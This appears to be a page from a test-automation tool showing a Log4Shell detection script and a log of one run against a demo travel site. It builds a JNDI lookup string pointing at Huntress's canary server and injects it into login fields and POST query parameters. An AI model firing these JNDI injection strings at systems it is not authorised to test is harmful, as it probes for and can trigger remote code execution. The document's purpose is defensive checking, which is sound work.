xxxxxxxxxx//// Change this to the site you wish to test against// As mentioned on huntress Log4Shell, a negative test does // NOT mean that your site is not vulnerable.//// While this script is meant to be generic, you can modify// it to be specific to your login page manually if needed.//// See: https://log4shell.huntress.com///// Note this script was last updated : 14th Dec 2021//// !!! MODIFY THE SITE URL HERE (phptravels, is a dummy testing site)let testSite = "https://www.phptravels.net/"//------------------------------------------------------------------------TEST.log.info("DISCLAIMER: Your site is not guranteed to be safe, if this test passes, it only means you are definately vunerable if it fails - see : https://log4shell.huntress.com/ for more info.")TEST.log.info("This test snippet/test function should ONLY be used against sites you are permitted to test against")// Function which helps make this test, easily reusable across multiple URLSSfunction testWebsiteForLog4Shell(testURL) { // Lets get the log4shell test token I.goTo("https://log4shell.huntress.com/") let log4shell_id = I.getText("/html/body/main/div/p[5]/code") let log4shell_str = "${jndi:ldap://log4shell.huntress.com:1389/"+log4shell_id+"}"; TEST.log.info("Log4Shell Test ID: "+log4shell_id) // Lets go to the target site, and test it I.goTo(testURL) //------------------------------------------------------------------------ if( ( I.see$$("unusual activity") || I.see$$("protected") ) && I.see$$("206.189") ) { TEST.log.info("Log4Shell Test Aborted : your website is protected by a WAF which blocks common attack patterns for this exploit - it is still recommended to validate internally, and ensure your system is protected without the use of a WAF"); }Hi, I'm TAMI (Test Authoring Machine Intelligence).
Let me assist you in writing a test. Tell me a scenario to test, and I’ll write the test script for you!
SUCCESS!
1m 49s (17s)
1.
[start of test]
2.
DISCLAIMER: Your site is not guranteed to be safe, if this test passes, it only means you are definately vunerable if it fails - see : https://log4shell.huntress.com/ for more info.
3.
This test snippet/test function should ONLY be used against sites you are permitted to test against
4.
I go to "https://log4shell.huntress.com/"
1.3s
5.
I get text from "/html/body/main/div/p[5]/code"
0.1s
6.
Log4Shell Test ID: 625505f8-216d-497f-916b-3df24ff881b8
7.
I go to "https://www.phptravels.net/"
3.5s
8.
I click "Login"
9.
I click "Password"
10.
I fill "Password": "${jndi:ldap://log4shell.huntress.com:1389/625505f8-216d-497f-916b-3df24ff881b8}"
2.2s
11.
I click "Email"
12.
I fill "Email": "${jndi:ldap://log4shell.huntress.com:1389/625505f8-216d-497f-916b-3df24ff881b8}"
2.6s
13.
I click "Login"
14.
I wait for 5s
5.0s
15.
POST https://www.phptravels.net/?x=%24%7Bjndi%3Aldap%3A%2F%2Flog4shell.huntress.com%3A1389%2F625505f8-216d-497f-916b-3df24ff881b8%7D
Info: 403
0.4s
16.
POST https://www.phptravels.net//api?x=%24%7Bjndi%3Aldap%3A%2F%2Flog4shell.huntress.com%3A1389%2F625505f8-216d-497f-916b-3df24ff881b8%7D
Info: 403
0.3s
17.
POST api.https://www.phptravels.net/?x=%24%7Bjndi%3Aldap%3A%2F%2Flog4shell.huntress.com%3A1389%2F625505f8-216d-497f-916b-3df24ff881b8%7D
Info: Failed to execute 'send' on 'XMLHttpRequest': Failed to load 'api.https://www.phptravels.net/?x=%24%7Bjndi%3Aldap%3A%2F%2Flog4shell.huntress.com%3A1389%2F625505f8-216d-497f-916b-3df24ff881b8%7D'.
18.
POST api.https://www.phptravels.net//api?x=%24%7Bjndi%3Aldap%3A%2F%2Flog4shell.huntress.com%3A1389%2F625505f8-216d-497f-916b-3df24ff881b8%7D
Info: Failed to execute 'send' on 'XMLHttpRequest': Failed to load 'api.https://www.phptravels.net//api?x=%24%7Bjndi%3Aldap%3A%2F%2Flog4shell.huntress.com%3A1389%2F625505f8-216d-497f-916b-3df24ff881b8%7D'.
19.
I go to "https://log4shell.huntress.com/view/625505f8-216d-497f-916b-3df24ff881b8"
1.1s
20.
GET https://log4shell.huntress.com/json/625505f8-216d-497f-916b-3df24ff881b8
0.1s
21.
No active Log4Shell exploit found
22.
[end of test]
